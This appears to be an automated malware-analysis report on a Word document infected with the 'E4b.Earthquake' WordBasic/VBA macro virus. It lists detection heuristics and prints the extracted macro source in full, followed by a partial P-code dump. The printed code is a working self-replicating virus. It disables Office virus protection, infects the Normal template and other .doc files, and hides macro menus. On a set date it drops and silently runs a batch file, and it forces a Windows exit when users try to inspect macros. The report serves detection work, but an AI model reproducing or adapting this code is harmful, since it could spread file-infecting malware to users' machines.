MALICIOUS
Risk Score: 256
MITRE ATT&CK: T1059.005 Visual Basic
Malware Insights
This legacy Word document contains a WordBasic macro virus, identified by multiple heuristics including OLE_LEGACY_WORDBASIC_MACRO_VIRUS and OLE_VBA_PCODE_AUTOEXEC_EXEC. The AutoOpen and AutoClose macros are present, and the critical OLE_VBA_SHELL heuristic indicates the execution of arbitrary code. The script attempts to execute 'c:\start.scr' and 'c:\startv.bat' on the 20th day of the month, and exports its own code to 'c:\E4.sys', suggesting a downloader or dropper functionality.
Heuristics (7)
- ClamAV: Win.Trojan.Pivis-2 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Win.Trojan.Pivis-2
- VBA macros detected (medium, 4 related findings, OLE_VBA_MACROS): Document contains VBA macro code
- Potential Shell call in VBA (critical, OLE_VBA_SHELL): Potential Shell call in VBA. Matched line in script: Shell ("c:\startv.bat"), vbHide
- VBA macro-virus self-replication / AV tampering (critical, OLE_VBA_MACRO_VIRUS_REPLICATION): VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature. Matched line in script: Options.VirusProtection = False
- AutoOpen macro (low, OLE_VBA_AUTOOPEN): AutoOpen macro. Matched line in script: Sub AutoOpen()
- Auto_Close macro (low, OLE_VBA_AUTOCLOSE): Auto_Close macro. Matched line in script: Sub AutoClose()
- Legacy WordBasic macro-virus markers (high, OLE_LEGACY_WORDBASIC_MACRO_VIRUS): OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 90882 bytes |

SHA-256: 5c5d33b0f30a71c0581315a7e78fbe58d523916b1e563b533a85239c29116f11

Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "E4"
Sub E4()
On Error Resume Next
' The E4b.Earthquake Virus
' Based on the E4b Virus Core
' Word 97 Macro Virus all Service Packs
' Created on the 21st May 2000
' Created for Testing & Educational Purposes ONLY
' Not for Main Stream Distribution
Options.ConfirmConversions = False
Options.VirusProtection = False
Options.SaveNormalPrompt = False
CommandBars("Tools").Controls("Macro").Delete
CommandBars("Tools").Controls("Templates and Add-Ins...").Delete
CommandBars("Format").Controls("Style...").Delete
If Day(Now()) = 20 Then Call Prog("C:\start.scr")
If Day(Now()) = 20 Then Call startv("c:\startv.bat")
Application.VBE.ActiveVBProject.VBComponents("E4").Export "c:\E4.sys"
For I = 1 To NormalTemplate.VBProject.VBComponents.Count
If NormalTemplate.VBProject.VBComponents(I).Name = "E4" Then NormInstall = True
Next I
For I = 1 To ActiveDocument.VBProject.VBComponents.Count
If ActiveDocument.VBProject.VBComponents(I).Name = "E4" Then ActivInstall = True
Next I
If ActivInstall = True And NormInstall = False Then Set Lotion = NormalTemplate.VBProject _
Else If ActivInstall = False And NormInstall = True Then Set Lotion = ActiveDocument.VBProject
Lotion.VBComponents.Import ("c:\E4.sys")
End Sub
Sub FileNew()
On Error Resume Next
Call E4
Dialogs(wdDialogFileNew).Show
Skip = 1
Call E4
End Sub
Sub FileSave()
On Error Resume Next
Call E4
ActiveDocument.Save
End Sub
Sub FileClose()
On Error Resume Next
Call E4
If ActiveDocument.Saved = False Then ActiveDocument.Save
ActiveDocument.Close
End Sub
Sub ToolsOptions()
On Error Resume Next
Dialogs(wdDialogToolsOptions).Show
Call E4
End Sub
Sub EditFind()
On Error Resume Next
Dialogs(wdDialogEditFind).Show
Call E4
End Sub
Sub FileSaveAs()
On Error Resume Next
Dialogs(wdDialogFileSaveAs).Show
Call E4
End Sub
Sub FilePrint()
On Error Resume Next
Dialogs(wdDialogFilePrint).Show
Call E4
End Sub
Sub FileExit()
On Error Resume Next
Call E4
If ActiveDocument.Saved = False Then ActiveDocument.Save
Application.WindowState = wdWindowStateMinimize
pName = CurDir & "\"
fName = Dir(pName & "*.doc", sAttr)
If (fName <> "") And ((fName <> ".") And (fName <> "..")) Then InfectDoc = pName & fName
Documents.Open FileName:=InfectDoc, ConfirmConversions:=False, ReadOnly:= _
False, AddToRecentFiles:=False, PasswordDocument:=""
Call E4
Do While (fName <> "")
fName = Dir()
If (fName <> "") And _
((fName <> ".") And (fName <> "..")) Then
InfectDoc = pName & fName
Documents.Open FileName:=InfectDoc, ConfirmConversions:=False, ReadOnly:= _
False, AddToRecentFiles:=False, PasswordDocument:=""
Call E4
If ActiveDocument.Saved = False Then ActiveDocument.Save
End If
Loop
Application.Quit
End Sub
Sub AutoExit()
On Error Resume Next
Call E4
Application.WindowState = wdWindowStateMinimize
pName = CurDir & "\"
fName = Dir(pName & "*.doc", sAttr)
If (fName <> "") And ((fName <> ".") And (fName <> "..")) Then InfectDoc = pName & fName
Documents.Open FileName:=InfectDoc, ConfirmConversions:=False, ReadOnly:= _
False, AddToRecentFiles:=False, PasswordDocument:=""
Call E4
Do While (fName <> "")
fName = Dir()
If (fName <> "") And _
((fName <> ".") And (fName <> "..")) Then
InfectDoc = pName & fName
Documents.Open FileName:=InfectDoc, ConfirmConversions:=False, ReadOnly:= _
False, AddToRecentFiles:=False, PasswordDocument:=""
Call E4
If ActiveDocument.Saved = False Then ActiveDocument.Save
End If
Loop
End Sub
Sub AutoOpen()
On Error Resume Next
Call E4
End Sub
Sub AutoExec()
On Error Resume Next
Call E4
End Sub
Sub AutoClose()
On Error Resume Next
Call E4
End Sub
Sub ToolsMacro()
On Error Resume Next
Call EPay
End Sub
Sub FileTemplates()
On Error Resume Next
Call EPay
End Sub
Sub ViewVBCode()
On Error Resume Next
Call EPay
End Sub
Sub EPay()
On Error Resume Next
If ActiveDocument.Saved = False Then ActiveDocument.Save
Tasks.ExitWindows
End Sub
Sub Prog(strFile As String)
On Error Resume Next
Dim hFile As Long
hFile = FreeFile
Open strFile For Output Access Write As hFile
Print #hFile, "N start.com"
Print #hFile, "RCX"
Print #hFile, "1550"
Print #hFile, "W"
Print #hFile, "Q"
Close hFile
End Sub
Sub startv(strFile As String)
Dim hFile As Long
Close hFile
On Error Resume Next
hFile = FreeFile
Open strFile For Output Access Write As hFile
Print #hFile, "@echo off"
Print #hFile, "cd\"
Print #hFile, "debug < start.scr > nul"
Print #hFile, "copy start.com start.exe"
Print #hFile, "del start.com"
Print #hFile, "del start.scr"
Print #hFile, "start"
Print #hFile, "del start.com"
Print #hFile, "del startv.bat"
Close hFile
Shell ("c:\startv.bat"), vbHide
End Sub
' Processing file: /tmp/qstore_wrjsm3id
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 1182 bytes
' Macros/VBA/E4 - 47546 bytes
' Line #0:
' Line #1:
' Line #2:
' FuncDefn (Sub E4())
' Line #3:
' OnError (Resume Next)
' Line #4:
' Line #5:
' QuoteRem 0x0000 0x0019 " The E4b.Earthquake Virus"
' Line #6:
' QuoteRem 0x0000 0x001C " Based on the E4b Virus Core"
' Line #7:
' QuoteRem 0x0000 0x0026 " Word 97 Macro Virus all Service Packs"
' Line #8:
' QuoteRem 0x0000 0x001D " Created on the 21st May 2000"
' Line #9:
' QuoteRem 0x0000 0x0030 " Created for Testing & Educational Purposes ONLY"
' Line #10:
' QuoteRem 0x0000 0x0021 " Not for Main Stream Distribution"
' Line #11:
' Line #12:
' LitVarSpecial (False)
' Ld Options
' MemSt ConfirmConversions
' Line #13:
' LitVarSpecial (False)
' Ld Options
' MemSt VirusProtection
' Line #14:
' LitVarSpecial (False)
' Ld Options
' MemSt SaveNormalPrompt
' Line #15:
' LitStr 0x0005 "Macro"
' LitStr 0x0005 "Tools"
' ArgsLd CommandBars 0x0001
' ArgsMemLd Controls 0x0001
' ArgsMemCall Delete 0x0000
' Line #16:
' LitStr 0x0018 "Templates and Add-Ins..."
' LitStr 0x0005 "Tools"
' ArgsLd CommandBars 0x0001
' ArgsMemLd Controls 0x0001
' ArgsMemCall Delete 0x0000
' Line #17:
' LitStr 0x0008 "Style..."
' LitStr 0x0006 "Format"
' ArgsLd CommandBars 0x0001
' ArgsMemLd Controls 0x0001
' ArgsMemCall Delete 0x0000
' Line #18:
' ArgsLd Now 0x0000
' ArgsLd Day 0x0001
' LitDI2 0x0014
' Eq
' If
' BoSImplicit
' LitStr 0x000C "C:\start.scr"
' ArgsCall (Call) Prog 0x0001
' EndIf
' Line #19:
' ArgsLd Now 0x0000
' ArgsLd Day 0x0001
' LitDI2 0x0014
' Eq
' If
' BoSImplicit
' LitStr 0x000D "c:\startv.bat"
' ArgsCall (Call) startv 0x0001
' EndIf
' Line #20:
' LitStr 0x0009 "c:\E4.sys"
' LitStr 0x0002 "E4"
' Ld Application
' MemLd VBE
' MemLd ActiveVBProject
' ArgsMemLd VBComponents 0x0001
' ArgsMemCall Export 0x0001
' Line #21:
' StartForVariable
' Ld I
' EndForVariable
' LitDI2 0x0001
' Ld NormalTemplate
' MemLd VBProject
' MemLd VBComponents
' MemLd Count
' For
' Line #22:
' Ld I
' Ld NormalTemplate
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' MemLd New
' LitStr 0x0002 "E4"
' Eq
' If
' BoSImplicit
' LitVarSpecial (True)
' St NormInstall
' EndIf
' Line #23:
' StartForVariable
' Ld I
' EndForVariable
' NextVar
' Line #24:
' StartForVariable
' Ld I
' EndForVariable
' LitDI2 0x0001
' Ld ActiveDocument
' MemLd VBProject
' MemLd VBComponents
' MemLd Count
' For
' Line #25:
' Ld I
' Ld ActiveDocument
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' MemLd New
' LitStr 0x0002 "E4"
' Eq
' If
' BoSImplicit
' LitVarSpecial (True)
' St ActivInstall
' EndIf
' Line #26:
' StartForVariable
' Ld I
' EndForVariable
' NextVar
' Line #27:
' LineCont 0x0004 0F 00 00 00
' Ld ActivInstall
' LitVarSpecial (True)
' Eq
' Ld NormInstall
' LitVarSpecial (False)
' Eq
' And
' If
' BoSImplicit
' SetStmt
' Ld NormalTemplate
' MemLd VBProject
' Set Lotion
' Else
' BoSImplicit
' Ld ActivInstall
' LitVarSpecial (False)
' Eq
' Ld NormInstall
' LitVarSpecial (True)
' Eq
' And
' If
' BoSImplicit
' SetStmt
' Ld ActiveDocument
' MemLd VBProject
' Set Lotion
' EndIf
' EndIf
' Line #28:
' LitStr 0x0009 "c:\E4.sys"
' Paren
' Ld Lotion
' MemLd VBComponents
' ArgsMemCall Import 0x0001
' Line #29:
' EndSub
' Line #30:
' Line #31:
' FuncDefn (Sub FileNew())
' Line #32:
' OnError (Resume Next)
' Line #33:
' ArgsCall (Call) E4 0x0000
' Line #34:
' Ld wdDialogFileNew
' ArgsLd Dialogs 0x0001
' ArgsMemCall Show 0x0000
' Line #35:
' LitDI2 0x0001
' St Skip
' Line #36:
' ArgsCall (Call) E4 0x0000
' Line #37:
' EndSub
' Line #38:
' FuncDefn (Sub FileSave())
' Line #39:
' OnError (Resume Next)
' Line #40:
' ArgsCall (Call) E4 0x0000
' Line #41:
' Ld ActiveDocument
' ArgsMemCall Save 0x0000
' Line #42:
' EndSub
' Line #43:
' FuncDefn (Sub FileClose())
' Line #44:
' OnError (Resume Next)
' Line #45:
' ArgsCall (Call) E4 0x0000
' Line #46:
' Ld ActiveDocument
' MemLd Saved
' LitVarSpecial (False)
' Eq
' If
' BoSImplicit
' Ld ActiveDocument
' ArgsMemCall Save 0x0000
' EndIf
' Line #47:
' Ld ActiveDocument
' ArgsMemCall Close 0x0000
' Line #48:
' EndSub
' Line #49:
' FuncDefn (Sub ToolsOptions())
' Line #50:
' OnError (Resume Next)
' Line #51:
' Ld wdDialogToolsOptions
' ArgsLd Dialogs 0x0001
' ArgsMemCall Show 0x0000
' Line #52:
' ArgsCall (Call) E4 0x0000
' Line #53:
' EndSub
' Line #54:
' FuncDefn (Sub EditFind())
' Line #55:
' OnError (Resume Next)
' Line #56:
' Ld wdDialogEditFind
' ArgsLd Dialogs 0x0001
' ArgsMemCall Show 0x0000
' Line #57:
' ArgsCall (Call) E4 0x0000
' Line #58:
' EndSub
' Line #59:
' FuncDefn (Sub FileSaveAs())
' Line #60:
' OnError (Resume Next)
' Line #61:
' Ld wdDialogFileSaveAs
' ArgsLd Dialogs 0x0001
' ArgsMemCall Show 0x0000
' Line #62:
' ArgsCall (Call) E4 0x0000
' Line #63:
' EndSub
' Line #64:
' FuncDefn (Sub FilePrint())
' Line #65:
' OnError (Resume Next)
' Line #66:
' Ld wdDialogFilePrint
' ArgsLd Dialogs 0x0001
' ArgsMemCall Show 0x0000
' Line #67:
' ArgsCall (Call) E4 0x0000
' Line #68:
' EndSub
' Line #69:
' Line #70:
' FuncDefn (Sub FileExit())
' Line #71:
' OnError (Resume Next)
' Line #72:
' ArgsCall (Call) E4 0x0000
' Line #73:
' Ld ActiveDocument
' MemLd Saved
' LitVarSpecial (False)
' Eq
' If
' BoSImplicit
' Ld ActiveDocument
' ArgsMemCall Save 0x0000
' EndIf
' Line #74:
' Ld wdWindowStateMinimize
' Ld Application
' MemSt WindowState
' Line #75:
' Ld CurDir
' LitStr 0x0001 "\"
' Concat
' St pName
' Line #76:
' Ld pName
' LitStr 0x0005 "*.doc"
' Concat
' Ld sAttr
' ArgsLd Dir 0x0002
' St fName
' Line #77:
' Ld fName
' LitStr 0x0000 ""
' Ne
' Paren
' Ld fName
' LitStr 0x0001 "."
' Ne
' Paren
' Ld fName
' LitStr 0x0002 ".."
' Ne
' Paren
' And
' Paren
' And
' If
' BoSImplicit
' Ld pName
' Ld fName
' Concat
' St InfectDoc
' EndIf
' Line #78:
' LineCont 0x0004 0D 00 00 00
' Ld InfectDoc
' ParamNamed FileName
' LitVarSpecial (False)
' ParamNamed ConfirmConversions
' LitVarSpecial (False)
' ParamNamed ReadOnly
' LitVarSpecial (False)
' ParamNamed AddToRecentFiles
' LitStr 0x0000 ""
' ParamNamed PasswordDocument
' Ld Documents
' ArgsMemCall Option 0x0005
' Line #79:
' ArgsCall (Call) E4 0x0000
' Line #80:
' Ld fName
' LitStr 0x0000 ""
' Ne
' Paren
' DoWhile
' Line #81:
' ArgsLd Dir 0x0000
' St fName
' Line #82:
' LineCont 0x0004 07 00 00 00
' Ld fName
' LitStr 0x0000 ""
' Ne
' Paren
' Ld fName
' LitStr 0x0001 "."
' Ne
' Paren
' Ld fName
' LitStr 0x0002 ".."
' Ne
' Paren
' And
' Paren
' And
' IfBlock
' Line #83:
' Ld pName
' Ld fName
' Concat
' St InfectDoc
' Line #84:
' LineCont 0x0004 0D 00 00 00
' Ld InfectDoc
' ParamNamed FileName
' LitVarSpecial (False)
' ParamNamed ConfirmConversions
' LitVarSpecial (False)
' ParamNamed ReadOnly
' LitVarSpecial (False)
' ParamNamed AddToRecentFiles
' LitStr 0x0000 ""
' ParamNamed PasswordDocument
' Ld Documents
' ArgsMemCall Option 0x0005
' Line #85:
' ArgsCall (Call) E4 0x0000
' Line #86:
' Ld ActiveDocument
' MemLd Saved
' LitVarSpecial (False)
' Eq
' If
' BoSImplicit
' Ld ActiveDocument
' ArgsMemCall Save 0x0000
' EndIf
' Line #87:
' EndIfBlock
' Line #88:
' Loop
' Line #89:
' Ld Application
' ArgsMemCall Quit 0x0000
' Line #90:
' EndSub
' Line #91:
' Line #92:
' FuncDefn (Sub AutoExit())
' Line #93:
' OnError (Resume Next)
' Line #94:
' ArgsCall (Call) E4 0x0000
' Line #95:
' Ld wdWindowStateMinimize
' Ld Application
' MemSt WindowState
' Line #96:
' Ld CurDir
' LitStr 0x0001 "\"
' Concat
' St pName
' Line #97:
' Ld pName
' LitStr 0x0005 "*.doc"
' Concat
' Ld sAttr
' ArgsLd Dir 0x0002
' St fName
' Line #98:
' Ld fName
' LitStr 0x0000 ""
' Ne
' Paren
' Ld fName
' LitStr 0x0001 "."
' Ne
' Paren
' Ld fName
' LitStr 0x0002 ".."
' Ne
' Paren
' And
' Paren
' And
' If
' BoSImplicit
' Ld pName
' Ld fName
' Concat
' St InfectDoc
' EndIf
' Line #99:
' LineCont 0x0004 0D 00 00 00
…